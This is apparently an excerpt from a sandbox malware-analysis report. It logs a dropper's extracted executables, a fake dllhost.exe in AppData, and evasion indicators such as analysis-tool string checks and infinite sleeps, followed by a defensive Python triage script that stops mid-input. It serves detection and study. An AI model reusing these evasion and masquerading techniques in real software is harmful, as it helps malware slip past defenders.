Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: virus.exe.bin.exe, Module1.cs .Net Code: Main contains sample name check
Source: Hyra.exe.0.dr, Module1.cs .Net Code: Main contains sample name check
Source: final.exe.2.dr, Module1.cs .Net Code: Main contains sample name check
Source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, Hyra.exe, 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\virus.exe.bin.exe Memory allocated: 1780000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\virus.exe.bin.exe Memory allocated: 3550000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\virus.exe.bin.exe Memory allocated: 1B550000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Memory allocated: B00000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Memory allocated: 2AA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Memory allocated: 1AAA0000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Memory allocated: 15D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Memory allocated: 3330000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Memory allocated: 1B330000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Memory allocated: E20000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Memory allocated: 2A60000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Memory allocated: 4A60000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Memory allocated: C40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Memory allocated: 2820000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Memory allocated: 4820000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: 870000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: 2680000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: AD0000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: 6200000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: 7200000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: 7360000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: 8360000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: AC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: 2A10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: 4A10000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: 5CF0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: 6CF0000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: DD0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: 2C90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: 1050000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: BF0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: 2960000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: C60000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\Desktop\virus.exe.bin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (6 identical entries)
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Thread delayed: delay time: 922337203685477 (3 identical entries)
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Thread delayed: delay time: 598916
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Thread delayed: delay time: 598625
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Thread delayed: delay time: 598409
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Thread delayed: delay time: 598260
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Thread delayed: delay time: 598063
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Thread delayed: delay time: 597625
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (2 identical entries)
Source: C:\Users\user\AppData\Roaming\dllhost.exe Thread delayed: delay time: 922337203685477 (10 identical entries)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer (2 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 560
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 490
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1449
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2040
Source: C:\Users\user\AppData\Roaming\dllhost.exe Window / User API: threadDelayed 1396
Source: C:\Users\user\AppData\Roaming\dllhost.exe Window / User API: threadDelayed 742
Source: C:\Users\user\AppData\Roaming\dllhost.exe Window / User API: threadDelayed 834
Source: C:\Users\user\Desktop\virus.exe.bin.exe TID: 7160 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe TID: 6320 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1556 Thread sleep count: 560 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5116 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4072 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1516 Thread sleep count: 490 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4196 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2788 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4892 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2824 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3272 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe TID: 5576 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe TID: 596 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe TID: 6408 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe TID: 5028 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe TID: 6428 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe TID: 6428 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe TID: 6428 Thread sleep time: -598916s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe TID: 6428 Thread sleep time: -598625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe TID: 6428 Thread sleep time: -598409s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe TID: 6428 Thread sleep time: -598260s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe TID: 6428 Thread sleep time: -598063s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe TID: 6428 Thread sleep time: -597625s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4488 Thread sleep count: 2040 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3244 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4924 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 5208 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 2332 Thread sleep time: -698000s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 2332 Thread sleep time: -417000s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 2028 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 4080 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 4108 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 2792 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 4948 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 5088 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 3608 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 2716 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 3744 Thread sleep time: -922337203685477s >= -30000s
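The sleep figures above are the raw material for the report's time-based evasion signatures (a single wait at or past the sandbox budget, or a loop of many short ones). The Python below is an added triage example, not part of the Joe Sandbox report or of the sample's tooling: it parses lines in exactly the format shown here, aggregates them per thread, and tags what each thread did. The line layout and the 30000 ms / 30-count thresholds are taken from the report as printed. The sentinel 922337203685477 equals Int64.MaxValue / 10000, which is TimeSpan.MaxValue expressed in milliseconds, and the larger figures in this section (1844674407370954, 2767011611056431, 4611686018427385) are exact multiples of it; the script therefore reports them as "n infinite waits on this thread" rather than as one huge number. That reading is mine, not the sandbox's. The sample input is a handful of lines copied from this section.

```python
import re
from collections import defaultdict

# Assumed line layout, copied from this section of the report:
#   Source: <image> TID: <tid> Thread sleep time: -600000s >= -30000s
#   Source: <image> TID: <tid> Thread sleep count: 560 > 30
# The sandbox prints accumulated sleep as a negative number; only the magnitude matters here.
SLEEP_RE = re.compile(
    r"^Source: (?P<image>\S+) TID: (?P<tid>\d+) Thread sleep time: -(?P<ms>\d+)s >= -(?P<limit>\d+)s"
)
COUNT_RE = re.compile(
    r"^Source: (?P<image>\S+) TID: (?P<tid>\d+) Thread sleep count: (?P<count>\d+) > (?P<limit>\d+)"
)

# Int64.MaxValue ticks / 10000 ticks-per-ms = TimeSpan.MaxValue in milliseconds.
# A .NET wait of this length never elapses, so a thread reporting it has parked itself;
# the larger values in the report are exact multiples (one per parked wait on the thread).
INFINITE_MS = (2**63 - 1) // 10_000          # 922337203685477


def infinite_multiple(ms):
    """Return n when ms == n * INFINITE_MS, otherwise 0."""
    return ms // INFINITE_MS if ms and ms % INFINITE_MS == 0 else 0


def parse_sleep_lines(lines):
    """Yield (image, tid, kind, value) for every sleep-related line; ignore everything else."""
    for line in lines:
        m = SLEEP_RE.match(line)
        if m:
            yield m["image"], int(m["tid"]), "sleep_ms", int(m["ms"])
            continue
        m = COUNT_RE.match(line)
        if m:
            yield m["image"], int(m["tid"]), "sleep_count", int(m["count"])


def triage_sleeps(lines, long_ms=30_000, count_limit=30):
    """Aggregate per (image basename, tid) and tag the time-based evasion each thread shows.

    long_ms and count_limit default to the thresholds the report itself prints
    (">= -30000s" and "> 30").
    """
    threads = defaultdict(lambda: {"sleeps": [], "count": 0})
    for image, tid, kind, value in parse_sleep_lines(lines):
        key = (image.rsplit("\\", 1)[-1].lower(), tid)
        if kind == "sleep_ms":
            threads[key]["sleeps"].append(value)
        else:
            threads[key]["count"] = max(threads[key]["count"], value)

    verdicts = {}
    for key, rec in threads.items():
        tags = set()
        for ms in rec["sleeps"]:
            n = infinite_multiple(ms)
            if n:
                tags.add(f"infinite_wait_x{n}")     # thread parked itself n times
            elif ms >= long_ms:
                tags.add("long_sleep")              # finite, but past the sandbox budget
        if rec["count"] > count_limit:
            tags.add("sleep_loop")                  # many short sleeps instead of one long one
        verdicts[key] = sorted(tags)
    return verdicts


# Sample input: a constructed subset of lines copied verbatim from this section.
SAMPLE_LINES = r"""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1556 Thread sleep count: 560 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4892 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3272 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2824 Thread sleep time: -30000s >= -30000s
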